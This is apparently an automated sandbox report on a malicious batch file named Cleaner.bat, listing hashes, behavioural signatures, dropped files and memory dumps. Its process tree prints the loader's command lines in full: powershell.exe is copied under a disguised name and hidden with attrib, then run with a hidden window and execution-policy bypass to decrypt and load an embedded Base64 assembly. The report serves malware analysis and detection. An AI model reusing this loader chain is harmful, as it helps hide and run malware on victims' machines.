Analysis
- max time kernel: 41s
- max time network: 44s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 17-05-2022 11:55
Static task: static1
Behavioral task: behavioral1
- Sample: Cleaner.bat
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: Cleaner.bat
- Resource: win10v2004-20220414-en
General
- Target: Cleaner.bat
- Size: 3.1MB
- MD5: b0f63b3801d950a3ce8f27d08d4b413a
- SHA1: 5445683bc8c1bdc716ae84cd59dea91ae814dd19
- SHA256: 0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233
- SHA512: 051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes (pid | process):
  628 | Cleaner.bat.exe
- Loads dropped DLL (1 IoCs)
  Processes (pid | process):
  1468 | cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid | process):
  628 | Cleaner.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 628 | Cleaner.bat.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes (description | pid | process | target process):
  PID 1468 wrote to memory of 820 | 1468 | cmd.exe | cmd.exe
  PID 1468 wrote to memory of 820 | 1468 | cmd.exe | cmd.exe
  PID 1468 wrote to memory of 820 | 1468 | cmd.exe | cmd.exe
  PID 1468 wrote to memory of 1992 | 1468 | cmd.exe | xcopy.exe
  PID 1468 wrote to memory of 1992 | 1468 | cmd.exe | xcopy.exe
  PID 1468 wrote to memory of 1992 | 1468 | cmd.exe | xcopy.exe
  PID 1468 wrote to memory of 968 | 1468 | cmd.exe | attrib.exe
  PID 1468 wrote to memory of 968 | 1468 | cmd.exe | attrib.exe
  PID 1468 wrote to memory of 968 | 1468 | cmd.exe | attrib.exe
  PID 1468 wrote to memory of 628 | 1468 | cmd.exe | Cleaner.bat.exe
  PID 1468 wrote to memory of 628 | 1468 | cmd.exe | Cleaner.bat.exe
  PID 1468 wrote to memory of 628 | 1468 | cmd.exe | Cleaner.bat.exe
  PID 628 wrote to memory of 1372 | 628 | Cleaner.bat.exe | csc.exe
  PID 628 wrote to memory of 1372 | 628 | Cleaner.bat.exe | csc.exe
  PID 628 wrote to memory of 1372 | 628 | Cleaner.bat.exe | csc.exe
  PID 1468 wrote to memory of 1032 | 1468 | cmd.exe | attrib.exe
  PID 1468 wrote to memory of 1032 | 1468 | cmd.exe | attrib.exe
  PID 1468 wrote to memory of 1032 | 1468 | cmd.exe | attrib.exe
- Views/modifies file attributes (1 TTPs, 2 IoCs)
  Processes (pid | process):
  968 | attrib.exe
  1032 | attrib.exe
Processes (process tree; children are indented under their parent)
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F"
  - C:\Windows\system32\xcopy.exe
    Command line: xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y
  - C:\Windows\system32\attrib.exe
    Command line: attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
    Signatures: Views/modifies file attributes
  - C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
    Command line: Cleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdline"
  - C:\Windows\system32\attrib.exe
    Command line: attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
    Signatures: Views/modifies file attributes
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- \??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.0.cs
  Filesize: 744B
  MD5: 7ba109a6ade3811040a994c47678a924
  SHA1: 852d06b7e9d96fcd7ed0de7dca03882044d6684a
  SHA256: 82b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3
  SHA512: f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971
- \??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdline
  Filesize: 309B
  MD5: f0df972c32b5c646e8daf7eab4f05f8a
  SHA1: 3181a85879c58713fc79f6147963716dc1606934
  SHA256: 4239fb5041edd1d60b8ce4e57875adb7ed3a3674c6b669de9616e5e8141b1be4
  SHA512: a4ccd209b72e9d19acf349d41ca825014c9b749cb68b0844862714ab03dbcea39f34e643b77e9048cdf9bd2a5f5c94aaa63d3f4d7138c082af1650e14f3757ee
- \Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/628-59-0x0000000000000000-mapping.dmp
- memory/628-61-0x000007FEFB551000-0x000007FEFB553000-memory.dmp
  Filesize: 8KB
- memory/628-62-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp
  Filesize: 11.4MB
- memory/628-67-0x000000000252B000-0x000000000254A000-memory.dmp
  Filesize: 124KB
- memory/628-66-0x0000000002524000-0x0000000002527000-memory.dmp
  Filesize: 12KB
- memory/820-54-0x0000000000000000-mapping.dmp
- memory/968-56-0x0000000000000000-mapping.dmp
- memory/1032-68-0x0000000000000000-mapping.dmp
- memory/1372-63-0x0000000000000000-mapping.dmp
- memory/1992-55-0x0000000000000000-mapping.dmp